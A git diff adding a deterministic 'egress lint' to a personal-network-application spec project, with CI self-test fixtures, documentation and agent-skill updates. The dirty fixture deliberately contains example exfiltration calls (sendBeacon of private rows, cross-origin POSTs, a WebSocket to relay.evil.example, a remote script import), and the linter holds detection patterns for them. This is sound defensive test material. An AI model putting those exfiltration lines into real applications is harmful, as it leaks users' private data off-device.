diff --git a/.github/workflows/spec-lint.yml b/.github/workflows/spec-lint.yml index 5800b44..a4088b3 100644 --- a/.github/workflows/spec-lint.yml +++ b/.github/workflows/spec-lint.yml @@ -14,3 +14,19 @@ jobs: with: python-version: "3.11" - run: python3 tools/lint-spec-ids.py + + egress-lint-selftest: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: actions/setup-python@v5 + with: + python-version: "3.11" + - name: clean fixture must pass (exit 0) + run: python3 tools/egress-lint.py tools/egress-lint-fixtures/clean + - name: dirty fixture must fail (exit 1) + run: | + if python3 tools/egress-lint.py tools/egress-lint-fixtures/dirty; then + echo "::error::egress-lint did not flag the dirty fixture" + exit 1 + fi diff --git a/README.md b/README.md index 44e2bdf..2fdd0c7 100644 --- a/README.md +++ b/README.md @@ -10,10 +10,17 @@ Three deliverables, in dependency order: 2. **Production-ready reference applications.** Working PNAs you can install, study, and adapt. — first reference design is a distributed directory archive (lives at [richbodo/fellows_local_db](https://github.com/richbodo/fellows_local_db)). 3. **AI tooling — skill + MCP (Model Context Protocol) servers.** How AI agents work with PNT. The skill at [`pna-build-eval-contrib/SKILL.md`](pna-build-eval-contrib/SKILL.md) is what an agent reads to consume the spec at design time. The MCP servers (typed contracts in [`contracts/`](contracts/); three v1 stdio implementations in `fellows_local_db/mcp_servers/`) expose an already-built PNA's capabilities at runtime so AI clients (Claude Desktop, Cursor, local Ollama agents) can drive a PNA on the user's behalf. -PNT supports three modes of use, all packaged in the [skill](pna-build-eval-contrib/SKILL.md): +PNT supports three modes of use, all packaged in the [skill](pna-build-eval-contrib/SKILL.md). **Install it once** so your agent auto-discovers it — symlink the skill into your skills directory (run from your PNT working directory): +```bash +mkdir -p ~/.claude/skills +ln -s "$(pwd)/pna-build-eval-contrib" ~/.claude/skills/pna-build-eval-contrib +``` + +A `git pull` here then updates the skill everywhere it's used. See [`docs/users-guide.md` § Install the skill](docs/users-guide.md#install-the-skill) for copy-instead-of-symlink, project-scoped, and no-install alternatives. With the skill installed, drive any mode in natural language: + +- **Evaluate.** *Audit any contact app for safety before you install it.* An AI agent reads the candidate's source, checks it against every applicable AC (Architectural Commitment), and returns a structured report flagging anything that would put your data at risk. The lowest-friction way in — and it doubles as a self-check on your own in-progress design. - **Build.** An AI agent reads the spec and helps you compose a conformant PNA against the typed contracts, adapting from a reference design that shares your axis picks. -- **Evaluate.** An AI agent audits a candidate PNA's source against every applicable AC (Architectural Commitment) and returns a structured report — useful for deciding whether someone else's PNA is safe to install, or for self-checking your own in-progress design. - **Contribute.** When you find a spec gap or have a design that adds ecosystem value, the skill walks you through preflight validation (Architecture document + AC attestation table) and then opens the PR back to PNT. See [`docs/users-guide.md`](docs/users-guide.md) for step-by-step instructions for each. diff --git a/docs/users-guide.md b/docs/users-guide.md index 98d85ba..2039240 100644 --- a/docs/users-guide.md +++ b/docs/users-guide.md @@ -4,7 +4,17 @@ The PNA (Personal Network Application) Spec is the canonical specification; this PNT (Personal Network Toolkit) is built to be consumed by AI coding agents. Most of this guide assumes you have an agent (Claude Code, Cursor, an equivalent) you can ask things like *"use the PNT skill to validate my design."* The skill at [`pna-build-eval-contrib/SKILL.md`](../pna-build-eval-contrib/SKILL.md) is the agent-consumption view of everything in this guide. -> **Status note (May 2026).** The three skill flows below — build, evaluate, contribute — haven't been exercised end-to-end yet. The materials are in place; Phase 5 of the reorganization plan validates them against `fellows_local_db` as the first reference design. The agent prompts and output shapes below describe the intended behavior per [`pna-build-eval-contrib/SKILL.md`](../pna-build-eval-contrib/SKILL.md); expect refinement as the skill gets dogfooded. +**The fastest way in is auditing.** If you just want to know whether a contact app is safe before you install it — without building or contributing anything — go straight to [Goal 2](#goal-2--audit-a-candidate-pna-before-installing-it). It's the lowest-friction front door to PNT: point an agent at the app's source and get back an AC-keyed safety report. + +> **Status note (May 2026).** PNT's deterministic tooling is now tested; the agent-driven flows are not yet exercised end-to-end. +> +> **Tested / CI-enforced:** +> - [`tools/egress-lint.py`](../tools/egress-lint.py) — the deterministic AC-1 egress check, with clean/dirty self-test fixtures run in CI. +> - [`tools/lint-spec-ids.py`](../tools/lint-spec-ids.py) — AC ↔ contract traceability lint, run in CI. +> - [`tools/evaluate-report.schema.json`](../tools/evaluate-report.schema.json) — the audit-report schema, validated against its meta-schema and conditional rules. +> +> **Not yet exercised end-to-end:** +> - The **build**, **audit**, and **contribute** skill flows. The materials are in place; Phase 5 of the reorganization plan validates them against `fellows_local_db` as the first reference design. The agent prompts and output shapes below describe the *intended* behavior per [`pna-build-eval-contrib/SKILL.md`](../pna-build-eval-contrib/SKILL.md); expect refinement as the skill gets dogfooded. --- @@ -68,7 +78,7 @@ You're starting (or extending) a personal network application. The Verification field is load-bearing for Goal 3 (Contribute). See Goal 6 for what makes a good Verification entry. -**7. Self-check.** Run Goal 2 (Audit) on your own in-progress code before declaring the design done. The agent walks every applicable AC and flags non-conformances. +**7. Self-check.** Run Goal 2 (Audit) on your own in-progress code before declaring the design done. The agent walks every applicable AC and flags non-conformances. For the AC-1 (private-data-sovereignty) row in particular, add an `egress-allow.json` to your repo listing the remote origins your flavor legitimately uses, and run [`tools/egress-lint.py`](../tools/egress-lint.py) against your source — it's the deterministic half of that check and makes a ready-made Verification entry (see Goal 6). Wire it into your own CI so a future change can't silently introduce an off-device data path. --- @@ -96,12 +106,16 @@ You have a PNA in front of you (someone else's, or your own in-progress one) and If the candidate ships its own Architecture document with an AC attestation table, the agent validates the document against the code (do cited code locations match the claimed realization? do declared verification mechanisms actually pass?). If there's no Architecture document, the agent infers axis picks from the source and walks every applicable AC from scratch. -**4. Read the AC-keyed report.** The agent produces a structured report keyed by AC ID: + As part of the audit the agent also runs the deterministic checks in `tools/` — notably [`tools/egress-lint.py`](../tools/egress-lint.py), which scans for off-device data leaks (the AC-1 sovereignty concern) — and folds their results into the matching AC findings as `source: deterministic` evidence, alongside its own reading. The deterministic layer catches the one violation that's easy to miss in a large tree; the LLM layer reasons about everything the lint can't. + +**4. Read the AC-keyed report.** The agent produces a structured report keyed by AC ID, emitted as a typed artifact ([`tools/evaluate-report.schema.json`](../tools/evaluate-report.schema.json)) with a human-readable rendering over it. Per-AC status is one of: - `conformant` — design honors this AC; cited code locations included - `non-conformant` — design violates this AC; report names the AC requirement and the offending code - `not-applicable` — design's flavor doesn't trigger this AC - `unable-to-determine` — needs human review + Because the report is typed, two runs over the same candidate are diffable. Ask the agent to save the artifact (e.g. `eval-report.json`); when the app ships an update, re-audit and diff the two JSON files — the per-AC status changes are your drift/regression signal (the "did anything quietly stop conforming?" check). The human-readable summary you read is just a rendering over this artifact. + **5. Decide.** Goals 1–5 are the load-bearing user-facing concerns — private-data sovereignty (Goal 1), source-mirroring honesty (Goal 2), transport security (Goal 3), durability (Goal 4), local diagnosability (Goal 5). If any of those are non-conformant, the design is not safe to trust with your data. Non-conformances against architectural details that don't touch Goals 1–5 are still worth fixing but aren't immediate red flags. **Optional: emphasize a specific concern.** E.g.: *"Focus on Goal 1 — make sure my Private DB rows can't leave my device."* This shapes the summary, not the underlying check. @@ -196,7 +210,7 @@ Your job as a contributor: fill in the **AC attestation table** in your Architec The Verification field is load-bearing. Three kinds are acceptable: -1. **Deterministic test** — a script or test file decides conformance mechanically. Example: a script that scans the codebase for any `fetch(...)` call to a non-localhost URL on the Private DB code path. +1. **Deterministic test** — a script or test file decides conformance mechanically. Example: [`tools/egress-lint.py`](../tools/egress-lint.py) scans the source for unsanctioned off-device egress vectors (`fetch`/`sendBeacon`/remote `src`/etc.) against an allow-list of the origins your flavor legitimately uses, and its `--json` output folds straight into the AC-1 finding of an evaluate report. 2. **LLM evaluation rubric** — a prompt or rubric describing what an LLM should look for. Useful for posture/intent ACs that mechanical tests can't reach. Example: *"Read every code path that reads from Private DB and decide whether any of them sends data off-device. Cite specific call sites."* 3. **Human-review note** — a short note explaining why no automated test is feasible, with the review record itself archived in the design's repo (e.g., `docs/conformance-review-2026-05.md`). @@ -228,5 +242,8 @@ The skill description triggers on natural-language requests fitting any of these - [`reference_designs/`](../reference_designs/) — accepted designs + templates - [`pna-build-eval-contrib/SKILL.md`](../pna-build-eval-contrib/SKILL.md) — the agent-consumption view (what you're invoking through the agent above) - [`CONTRIBUTING.md`](../CONTRIBUTING.md) — full contribution rules -- [`tools/`](../tools/) — validators +- [`tools/`](../tools/) — validators and the audit-report schema: + - [`tools/egress-lint.py`](../tools/egress-lint.py) — deterministic AC-1 check for off-device data leaks (Goals 1, 2, 6) + - [`tools/evaluate-report.schema.json`](../tools/evaluate-report.schema.json) — typed schema for the audit report (Goal 2) + - [`tools/lint-spec-ids.py`](../tools/lint-spec-ids.py) — AC ↔ contract traceability lint - [`plans/reorganization-plan.md`](../plans/reorganization-plan.md) — the live plan tracking PNT's own evolution diff --git a/llms.txt b/llms.txt index b14aecf..a361967 100644 --- a/llms.txt +++ b/llms.txt @@ -2,6 +2,8 @@ > Universal specification for personal network applications (PNAs). Defines vocabulary, goals, use cases, axes, composition (how PNAs get built), architectural commitments, and slot contracts. Targeted at AI agents and humans building PNAs together. +**New here? Start with the skill.** If you are an AI agent that landed here cold, read [`pna-build-eval-contrib/SKILL.md`](pna-build-eval-contrib/SKILL.md) first. It is the entry point: it routes you into the spec, contracts, and reference designs for whichever flow you need — **evaluate** ("is this app safe to install?"), **build**, or **contribute**. + ## Skill (agent entry point) - [pna-build-eval-contrib/SKILL.md](pna-build-eval-contrib/SKILL.md) — canonical PNT skill for AI agents. Three flows: build a conformant PNA from the spec, evaluate a candidate PNA's conformance against the spec, contribute a design back to PNT diff --git a/plans/pnt-next-steps-plan.md b/plans/pnt-next-steps-plan.md new file mode 100644 index 0000000..2bf1d46 --- /dev/null +++ b/plans/pnt-next-steps-plan.md @@ -0,0 +1,89 @@ +# PNT Next Steps — High-Level Plan + +Ordered as requested: **1 → 4 → 5 → 3 → 6 → 2**. High-level only; work the details with Claude Code. Each item notes how it rides the existing reorg phases and `tools/` conventions rather than starting a parallel track. + +Sequencing logic: a cheap README win first; then formalize the evaluate *output* (4) so later checks have a place to land; then a real design to test against (5); then the deterministic check (3) whose findings flow into that output; then a reading-gated architecture decision (6); then the skill split (2) last, once Evaluate has earned its place as the front door. + +--- + +## 1. Install signpost + promote Evaluate (quick win) — ✅ DONE (2026-05-29) + +**Goal.** Close the two remaining README gaps now that the skill is already surfaced and linked. + +> **Status:** Done. README now leads the three modes with Evaluate ("audit any contact app for safety before you install it") and carries a concrete symlink install snippet pointing to `docs/users-guide.md § Install the skill`; `llms.txt` opens with a "Start with the skill" line routing a cold agent to `SKILL.md` as the entry point. + +- Add a concrete **install/activation** snippet: how an agent picks up the skill (copy `pna-build-eval-contrib/` into `.claude/skills/`, or the equivalent one-liner), so it auto-discovers rather than relying on a human pasting the path. +- Reorder the "three modes" so **Evaluate leads** for the average reader — frame it as "audit any contact app for safety before you install it," with Build/Contribute following. Evaluate is the lowest-friction front door and the one a non-builder actually wants. +- Make `llms.txt` route a cold agent to the SKILL.md as the build/eval entry point. + +**Done when.** A new person can read the README and get an agent running Evaluate without asking how. + +--- + +## 4. Typed evaluate-report artifact — ✅ DONE (2026-05-29) + +**Goal.** Turn the evaluate flow's existing structured report into a typed artifact so results are machine-comparable and drift becomes a diff. + +> **Status:** Done. JSON Schema at `tools/evaluate-report.schema.json` (Draft 2020-12, validated): AC-keyed `findings` with per-AC `status` (`conformant`/`non-conformant`/`not-applicable`/`unable-to-determine`), code-location citations, a `summary` posture, and an `evidence` array tagged by `source` (`deterministic`/`llm`/`human`) — the seam item 3's egress lint feeds into. Conditional rules enforce citations-on-(non)conformant and rationale-on-(n/a, undetermined). Lives in `tools/`, not `contracts/`, because it realizes no AC (would fail `lint-spec-ids.py`). `SKILL.md` § Evaluate flow now emits the artifact as source of truth with the prose report as a view; `docs/users-guide.md` Goal 2 and the skill's Key resources updated. + +- Define a JSON Schema for the AC-keyed report (per-AC status: `conformant` / `non-conformant` / `not-applicable` / `unable-to-determine`, plus cited code locations and the summary posture). +- Have the evaluate flow emit to this schema; keep the human-readable rendering as a view over it. +- Reinforces README Goal 6 (AC as unit of identity) and gives the "occasionally re-check we didn't drift" workflow a concrete regression signal. + +**Done when.** Two eval runs on the same design can be diffed to show exactly which ACs changed status. + +--- + +## 5. Attest the mutual-aid / community-care use case + +**Goal.** Add the use case closest to your social-network-health origin — surface who in a personal network needs help and who can offer it, then communicate — alongside the existing Directory Archive / PRM / Multi-PNA entries in `use_cases.md`. + +- You're already building a reference design for this; let the design drive the use-case attestation rather than writing it speculatively. +- Treat it as the hardest privacy stress test: a "needs help" field is health/vulnerability-adjacent, so it should exercise your sovereignty and consent ACs harder than any prior design. Note any new flavor-derived ACs it surfaces (candidate Contribute-flow spec diff). + +**Done when.** The use case is attested in `use_cases.md` and backed by a working reference design with a filled AC attestation table. + +--- + +## 3. Egress lint (deterministic sovereignty check) — ✅ DONE (2026-05-29) + +**Goal.** One deterministic check guarding Goal 1 (private-data sovereignty): does any code path send private data off-device? + +> **Status:** Done. `tools/egress-lint.py` statically scans a PNA source tree for egress vectors (`fetch`/XHR/`sendBeacon`/`WebSocket`/`EventSource`/`import()`/`importScripts`/axios/jQuery and HTML `src`/`action`/`object data`/``/``), flagging any remote origin not on the design's `egress-allow.json` allow-list (localhost, root-relative, `data:`/`mailto:`, and `` navigation are correctly ignored). Exit 0/1 like `lint-spec-ids.py`; `--json` emits a `source: deterministic`, `tool: egress-lint` evidence object that validates against `#/$defs/evidence` in the item-4 schema and drops into an AC-1 finding (verified). Self-test fixtures in `tools/egress-lint-fixtures/{clean,dirty}` are CI-enforced via a new `egress-lint-selftest` job in `.github/workflows/spec-lint.yml`. Referenced from `SKILL.md` Key resources and `docs/users-guide.md` Goal 6. + +- Static scan for egress vectors (fetch / XHR / `sendBeacon` / form actions / `img`/script `src` to remote origins, etc.), allow-listing the legitimately remote picks per axis flavor. +- Lives in `tools/` next to `lint-spec-ids.py`, CI-enforced, same pattern. Not a general test runner — just the one violation that most destroys trust and that an LLM scanning a large tree might miss. +- Wire its output into the item-4 report schema as evidence on the relevant AC, so deterministic + LLM layers land in one place. + +**Done when.** A reference design's CI fails if an unsanctioned egress path is introduced. + +--- + +## 6. Tonsky file-sync as a candidate axis pick (reading-gated) + +**Goal.** After reading "Local, First, Forever," evaluate commodity file-sync (per-client append-only op logs over Dropbox/iCloud/Syncthing, CRDT merge underneath) as a new pick on the comms/distribution axes. + +- This is the local-first-pure path to multi-device / household-shared PNAs without reintroducing a SaaS root — relevant when a use case (e.g. a shared PRM or the item-5 community-care design) needs more than `mailto-only` + static mirror. +- Add as an axis pick with its flavor-derived ACs only if a real design needs it; don't add the option in the abstract. + +**Done when.** Either a documented axis pick backed by a design that uses it, or a recorded decision that it's deferred and why. + +--- + +## 2. Split out `pna-evaluate` as its own skill (last) + +**Goal.** Once Evaluate has proven itself as the front door (items 1, 4), give it its own skill for sharper auto-activation and standalone discoverability ("is this app safe to install?"). + +- Separate entry point + tight, trigger-phrase-rich description; **share a reference file** with the build/contribute skill so the "Principles to honor" and "Key resources" sections aren't duplicated. +- Keep Build (+ Contribute) together. Optionally publish Evaluate as a standalone surface (e.g. a Claude Project) so non-builders can use it without the rest of PNT. + +**Done when.** Evaluate triggers reliably on audit-intent requests on its own, with no duplicated spec body across skills. + +--- + +### Fit with the existing roadmap +- Items 1, 4, 3 are small and CI/README-local — landable independently of Phase 5. +- Item 5 is gated on your in-progress reference design and is the natural thing to validate Phase 5's end-to-end build/attestation against. +- Item 6 is gated on reading + a design that needs sync. +- Item 2 is deliberately last; it's an optimization, not a prerequisite. +- The meta-methodology extraction stays out of scope until a second non-trivial reference design ships. diff --git a/pna-build-eval-contrib/SKILL.md b/pna-build-eval-contrib/SKILL.md index 4dd7170..59a95dc 100644 --- a/pna-build-eval-contrib/SKILL.md +++ b/pna-build-eval-contrib/SKILL.md @@ -39,12 +39,14 @@ Inputs: a candidate PNA's source tree (or a description sufficient to read its b - If the candidate has an Architecture document with an AC attestation table, check that the declared verification mechanism actually runs and passes. 2. **For each flavor-derived AC in `spec/axes.md`** triggered by the candidate's axis picks, do the same. 3. **For each typed contract relevant to the candidate's axis picks**, check that the candidate implements the contract correctly. Contract headers (`Realizes: AC-X, AC-Y`) tell you which ACs the contract serves. -4. **Produce a structured report keyed by AC ID**: +4. **Produce a structured report keyed by AC ID.** The canonical form is the typed artifact at `tools/evaluate-report.schema.json` (JSON Schema). Emit an instance of that schema as the source of truth, then render the human-readable report as a *view* over it — don't hand-write the prose report and skip the artifact. Emitting the typed form is what makes two runs on the same candidate diffable (which ACs changed status). Per-AC status is one of: - `conformant` — with cited code locations. - `non-conformant` — with cited code locations showing the violation and the AC's stated requirement. - `not-applicable` — with reason (typically: the candidate's flavor doesn't trigger this AC). - `unable-to-determine` — with explanation; defaults to flagging for human review. -5. **Summarize at the top**: overall posture and the most concerning non-conformances. Goals 1–5 are the load-bearing user-facing concerns — anything compromising private-data sovereignty (Goal 1), source-mirroring honesty (Goal 2), transport security (Goal 3), durability (Goal 4), or local diagnosability (Goal 5) leads the summary. + + Each finding may also carry `evidence` entries tagged by `source` (`deterministic` / `llm` / `human`). When a deterministic check in `tools/` (e.g. the egress lint) has run against the candidate, fold its output in as a `source: deterministic` evidence entry on the AC it bears on, so the deterministic and LLM layers land on one finding. +5. **Summarize at the top** (the artifact's `summary` object): overall posture and the most concerning non-conformances. Goals 1–5 are the load-bearing user-facing concerns — anything compromising private-data sovereignty (Goal 1), source-mirroring honesty (Goal 2), transport security (Goal 3), durability (Goal 4), or local diagnosability (Goal 5) leads the summary. Callers may ask you to emphasize specific Goals or axes at runtime (e.g., "focus on private-data sovereignty"). Treat that as a hint for the summary, not a structural variation. @@ -110,6 +112,8 @@ A builder using Claude Code can drive both preflight and PR authoring end-to-end - `contracts/` — typed contracts (JSON Schema, OpenAPI, SQL DDL, TypeScript), each with a `Realizes: AC-X` header - `reference_designs/README.md` — index of accepted reference designs - `reference_designs/templates/` — the per-design and Architecture templates +- `tools/evaluate-report.schema.json` — typed artifact for the evaluate flow's AC-keyed report (the canonical, diffable output; the prose report is a view over it) +- `tools/egress-lint.py` — deterministic private-data-sovereignty check (AC-1): static scan for unsanctioned off-device egress vectors; `--json` emits evidence that folds into the report schema above. Run it against a candidate and fold its evidence into the AC-1 (and AC-2, server-side) finding. - `tools/lint-spec-ids.py` — checks AC ↔ contract traceability invariants - `CONTRIBUTING.md` — full contribution rules - `docs/prior_art.md` — survey of related work diff --git a/tools/egress-lint-fixtures/README.md b/tools/egress-lint-fixtures/README.md new file mode 100644 index 0000000..c1a124c --- /dev/null +++ b/tools/egress-lint-fixtures/README.md @@ -0,0 +1,15 @@ +# egress-lint fixtures + +Self-test inputs for [`../egress-lint.py`](../egress-lint.py). PNT bundles no +application code, so these fixtures are how PNT's own CI exercises the lint (the +real target of the lint is a reference design's source tree, in that design's +repo). + +- **`clean/`** — every egress vector is local or allow-listed (`egress-allow.json` + sanctions the single remote origin the flavor needs). Expected: **exit 0**. + Also a regression guard against false positives (`xmlns`, ``, + `mailto:`, `data:`, localhost, root-relative paths must NOT be flagged). +- **`dirty/`** — unsanctioned egress to non-allow-listed remote origins, no + allow-list. Expected: **exit 1** with one violation per off-device vector. + +CI (`.github/workflows/spec-lint.yml`) runs both and asserts the exit codes. diff --git a/tools/egress-lint-fixtures/clean/app.js b/tools/egress-lint-fixtures/clean/app.js new file mode 100644 index 0000000..c08f6b2 --- /dev/null +++ b/tools/egress-lint-fixtures/clean/app.js @@ -0,0 +1,20 @@ +// Clean fixture: every egress vector here is either local or allow-listed. +// Used by CI to prove egress-lint does not raise false positives on a +// conformant private-data-sovereignty posture. + +// Same-origin / root-relative — local, never flagged. +await fetch("/api/shared-bundle"); +await fetch("./manifest.json"); + +// localhost — local dev, not off-device. +const dev = new WebSocket("ws://localhost:5173"); + +// The one sanctioned remote origin for this flavor (see egress-allow.json). +await fetch("https://fellows.example.org/auth/session"); + +// Non-egress schemes — comms transport / inline data, not data egress. +const mail = "mailto:maintainer@fellows.example.org"; +const inline = "data:image/svg+xml;base64,PHN2Zz48L3N2Zz4="; + +// Relative dynamic import — local. +const mod = await import("./lib/render.js"); diff --git a/tools/egress-lint-fixtures/clean/egress-allow.json b/tools/egress-lint-fixtures/clean/egress-allow.json new file mode 100644 index 0000000..ccdb0d5 --- /dev/null +++ b/tools/egress-lint-fixtures/clean/egress-allow.json @@ -0,0 +1,9 @@ +{ + "ac": "AC-1", + "allow": [ + { + "origin": "https://fellows.example.org", + "reason": "distribution:web-bundle-with-magic-link — shared bundle + auth origin (the one sanctioned remote pick for this flavor)" + } + ] +} diff --git a/tools/egress-lint-fixtures/clean/index.html b/tools/egress-lint-fixtures/clean/index.html new file mode 100644 index 0000000..6c496b9 --- /dev/null +++ b/tools/egress-lint-fixtures/clean/index.html @@ -0,0 +1,14 @@ + + + + + + + + + logo + + docs +
+ + diff --git a/tools/egress-lint-fixtures/dirty/app.js b/tools/egress-lint-fixtures/dirty/app.js new file mode 100644 index 0000000..079c65c --- /dev/null +++ b/tools/egress-lint-fixtures/dirty/app.js @@ -0,0 +1,15 @@ +// Dirty fixture: unsanctioned egress vectors to non-allow-listed remote origins. +// CI asserts egress-lint exits 1 and flags each of these. There is no +// egress-allow.json here, so every remote origin is a violation. + +// Private data exfiltrated to a third-party analytics host. +navigator.sendBeacon("https://analytics.tracker.example/collect", JSON.stringify(privateRows)); + +// Cross-origin POST of contact data. +await fetch("https://api.thirdparty.example/sync", { method: "POST", body: notes }); + +// Remote websocket. +const ws = new WebSocket("wss://relay.evil.example/socket"); + +// Protocol-relative remote script load. +await import("//cdn.somewhere.example/lib.js"); diff --git a/tools/egress-lint-fixtures/dirty/index.html b/tools/egress-lint-fixtures/dirty/index.html new file mode 100644 index 0000000..cafd6df --- /dev/null +++ b/tools/egress-lint-fixtures/dirty/index.html @@ -0,0 +1,12 @@ + + + + + + + + + +
+ + diff --git a/tools/egress-lint.py b/tools/egress-lint.py new file mode 100755 index 0000000..d2d363b --- /dev/null +++ b/tools/egress-lint.py @@ -0,0 +1,226 @@ +#!/usr/bin/env python3 +"""Egress lint — deterministic private-data-sovereignty check (Goal 1 / AC-1). + +Scans a PNA's source tree for *egress vectors*: code or markup that can send a +request to a remote origin (and therefore could carry private data off-device). +Any remote origin that is not on the design's allow-list is a violation. + +This is intentionally narrow. It is NOT a general test runner — it guards the one +violation that most destroys trust (private data leaving the device) and that an +LLM scanning a large tree might miss. It is a *complement* to the LLM +architectural review described in pna-build-eval-contrib/SKILL.md, not a +replacement; it is heuristic (regex over source) and can have false positives, +which the allow-list and per-line output let a human triage quickly. + +Vectors detected: + JS/TS : fetch(), XMLHttpRequest.open(), navigator.sendBeacon(), + new WebSocket(), new EventSource(), importScripts(), dynamic import(), + axios(...), $.get/$.post/$.ajax/$.getJSON(...) + HTML : src= (img/script/iframe/video/audio/source/embed), +
, , (stylesheet/preload), + / (SVG) + — is navigation, not data egress, and is NOT flagged. + +What counts as local (never flagged): relative URLs, same-origin/root-relative +paths, fragments, data:/blob:/about: URIs, mailto:/tel: (comms, not data egress), +and localhost / 127.0.0.1 / [::1] / 0.0.0.0. Everything else absolute is remote +and must be on the allow-list. + +Allow-list. Remote origins a design legitimately talks to (per its axis flavor — +e.g. the auth + bundle origin for distribution:web-bundle-with-magic-link) are +declared in `/egress-allow.json` and/or passed with --allow. Format: + + { + "ac": "AC-1", + "allow": [ + {"origin": "https://fellows.example.org", + "reason": "distribution:web-bundle-with-magic-link — shared bundle + auth origin"} + ] + } + +("allow" entries may also be bare origin strings.) + +Output. Human-readable by default (path:line: [vector] url), exit 1 on any +violation, exit 0 if clean — same CI-friendly contract as lint-spec-ids.py. +With --json, emits an object whose `evidence` field conforms to the `evidence` +$def in tools/evaluate-report.schema.json (source=deterministic, tool=egress-lint), +ready to fold into the matching AC finding of an evaluate report. + +Usage: + egress-lint.py [--allow ORIGIN]... [--config PATH] + [--ac AC-ID] [--ext .js,.html,...] [--exclude DIR]... [--json] +""" +from __future__ import annotations + +import argparse +import json +import re +import sys +from pathlib import Path +from urllib.parse import urlparse + +DEFAULT_EXTS = {".js", ".mjs", ".cjs", ".jsx", ".ts", ".tsx", ".html", ".htm", ".vue", ".svelte"} +DEFAULT_EXCLUDES = {".git", "node_modules", "dist", "build", "out", "vendor", ".next", "coverage", "__pycache__"} +LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1", "[::1]", "0.0.0.0"} +NON_EGRESS_SCHEMES = {"data", "blob", "about", "mailto", "tel", "javascript", "#"} +DEFAULT_AC = "AC-1" + +# (name, regex). The URL is capture group 1. +VECTORS: list[tuple[str, re.Pattern[str]]] = [ + ("fetch", re.compile(r"""\bfetch\s*\(\s*['"`]([^'"`]+)['"`]""")), + ("xhr.open", re.compile(r"""\.open\s*\(\s*['"][A-Za-z]+['"]\s*,\s*['"`]([^'"`]+)['"`]""")), + ("sendBeacon", re.compile(r"""sendBeacon\s*\(\s*['"`]([^'"`]+)['"`]""")), + ("WebSocket", re.compile(r"""new\s+WebSocket\s*\(\s*['"`]([^'"`]+)['"`]""")), + ("EventSource", re.compile(r"""new\s+EventSource\s*\(\s*['"`]([^'"`]+)['"`]""")), + ("importScripts", re.compile(r"""importScripts\s*\(\s*['"`]([^'"`]+)['"`]""")), + ("import()", re.compile(r"""(?]*?\bsrc\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE | re.DOTALL)), + ("html.action", re.compile(r"""]*?\baction\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE | re.DOTALL)), + ("html.object", re.compile(r"""]*?\bdata\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE | re.DOTALL)), + ("html.link", re.compile(r"""]*?\bhref\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE | re.DOTALL)), + ("svg.use", re.compile(r"""]*?\b(?:xlink:)?href\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE | re.DOTALL)), +] + + +class Violation: + __slots__ = ("path", "line", "vector", "url") + + def __init__(self, path: str, line: int, vector: str, url: str) -> None: + self.path, self.line, self.vector, self.url = path, line, vector, url + + +def normalize_origin(value: str) -> str: + """Reduce an allow entry or URL to a comparable scheme://host[:port] origin.""" + p = urlparse(value if "//" in value else "//" + value, scheme="https") + host = (p.hostname or "").lower() + if not host: + return value.lower().rstrip("/") + origin = f"{p.scheme}://{host}" + if p.port: + origin += f":{p.port}" + return origin + + +def classify(url: str, allow: set[str]) -> str: + """Return 'local', 'allowed', or 'remote' for a URL string.""" + u = url.strip() + if not u: + return "local" + scheme = u.split(":", 1)[0].lower() if ":" in u.split("/", 1)[0] else "" + if u.startswith("#") or scheme in NON_EGRESS_SCHEMES: + return "local" + # Protocol-relative (//host/..) is remote; root-relative (/path) and bare + # relative paths are local. + if not u.startswith("//") and "://" not in u: + return "local" + p = urlparse(u if "://" in u else "https:" + u) + host = (p.hostname or "").lower() + if not host or host in LOCAL_HOSTS: + return "local" + origin = normalize_origin(u) + if origin in allow or host in allow: + return "allowed" + return "remote" + + +def line_of(text: str, pos: int) -> int: + return text.count("\n", 0, pos) + 1 + + +def scan_text(text: str, rel: str, allow: set[str]) -> list[Violation]: + out: list[Violation] = [] + for name, rx in VECTORS: + for m in rx.finditer(text): + url = m.group(1) + if classify(url, allow) == "remote": + out.append(Violation(rel, line_of(text, m.start(1)), name, url)) + return out + + +def load_allow(target: Path, config: Path | None, cli_allows: list[str], cli_ac: str | None) -> tuple[set[str], str]: + allow: set[str] = set() + ac = cli_ac or DEFAULT_AC + cfg_path = config or (target / "egress-allow.json") + if cfg_path.exists(): + data = json.loads(cfg_path.read_text()) + if not cli_ac and isinstance(data.get("ac"), str): + ac = data["ac"] + for entry in data.get("allow", []): + origin = entry["origin"] if isinstance(entry, dict) else entry + allow.add(normalize_origin(origin)) + for a in cli_allows: + allow.add(normalize_origin(a)) + return allow, ac + + +def iter_files(target: Path, exts: set[str], excludes: set[str]): + for p in sorted(target.rglob("*")): + if not p.is_file() or p.suffix.lower() not in exts: + continue + if any(part in excludes for part in p.relative_to(target).parts): + continue + yield p + + +def main() -> int: + ap = argparse.ArgumentParser(description="Egress lint — private-data-sovereignty check (AC-1).") + ap.add_argument("target", type=Path, help="Root of the PNA source tree to scan.") + ap.add_argument("--allow", action="append", default=[], metavar="ORIGIN", help="Allow a remote origin (repeatable).") + ap.add_argument("--config", type=Path, default=None, help="Allow-list JSON (default: /egress-allow.json).") + ap.add_argument("--ac", default=None, help=f"AC this check bears on (default: config's ac, else {DEFAULT_AC}).") + ap.add_argument("--ext", default=None, help="Comma-separated extensions to scan (overrides defaults).") + ap.add_argument("--exclude", action="append", default=[], metavar="DIR", help="Extra directory name to skip (repeatable).") + ap.add_argument("--json", action="store_true", help="Emit evaluate-report-compatible evidence JSON.") + args = ap.parse_args() + + target: Path = args.target + if not target.is_dir(): + print(f"egress-lint: target is not a directory: {target}", file=sys.stderr) + return 2 + + exts = {e if e.startswith(".") else "." + e for e in args.ext.split(",")} if args.ext else set(DEFAULT_EXTS) + excludes = set(DEFAULT_EXCLUDES) | set(args.exclude) + allow, ac = load_allow(target, args.config, args.allow, args.ac) + + violations: list[Violation] = [] + for f in iter_files(target, exts, excludes): + rel = str(f.relative_to(target)) + try: + violations.extend(scan_text(f.read_text(encoding="utf-8", errors="replace"), rel, allow)) + except OSError as e: + print(f"egress-lint: could not read {rel}: {e}", file=sys.stderr) + + if args.json: + citations = [{"path": v.path, "lines": str(v.line), "note": f"{v.vector} -> {v.url}"} for v in violations] + clean = not violations + detail = ( + "No unsanctioned egress vectors found; all remote origins are allow-listed." + if clean else + f"{len(violations)} unsanctioned egress 